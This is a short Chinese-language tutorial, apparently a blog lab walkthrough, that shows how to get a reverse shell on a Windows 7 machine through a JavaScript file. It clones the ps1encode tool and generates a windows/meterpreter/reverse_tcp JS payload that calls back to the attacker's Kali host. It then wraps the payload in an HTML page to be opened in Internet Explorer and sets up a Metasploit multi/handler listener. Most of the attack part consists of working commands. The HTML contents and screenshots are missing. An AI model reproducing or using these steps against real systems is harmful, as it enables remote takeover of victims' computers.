利用js文件反弹shell

1.环境

攻击机:Kali 192.168.42.138

靶机:Win7 192.168.42.139

2.安装工具ps1encode

下载地址:https://github.com/CroweCybersecurity/ps1encode

git clone https://github.com/CroweCybersecurity/ps1encode.git

利用js文件反弹shell_第1张图片

3. 利用js文件反弹shell

先利用ps1encode生成js payload

./ps1encode.rb --LHOST 192.168.42.138 --LPORT 1919 --PAYLOAD windows/meterpreter/reverse_tcp --ENCODE cmd -t js

利用js文件反弹shell_第2张图片

将payload复制到文件1.js中,直接执行js文件的话可能比较明显,所以写了一个1.html文件去远程调用js文件执行。

1.html文件内容如下:











PS需要将1.js和1.jsp文件放在同一目录下,开启http服务

Kali开启监听(利用msf监听模块):

msfconsole

msf6 > use /exploit/multi/handler

msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

msf6 exploit(multi/handler) > set lhost 192.168.42.138

msf6 exploit(multi/handler) > set lport 1919

msf6 exploit(multi/handler) >run

利用js文件反弹shell_第3张图片

PS:由于在生成js payload时使用了windows/meterpreter/reverse_tcp模块,因此在设置监听时也需要设置该模块。

将1.html文件复制到靶机,使用ie浏览器打开

选择允许阻止的内容->你想允许这种交互吗(是)

利用js文件反弹shell_第4张图片

利用js文件反弹shell_第5张图片

查看靶机,获取shell成功,权限为当前用户权限

利用js文件反弹shell_第6张图片

 

 

 

 

你可能感兴趣的:(安全)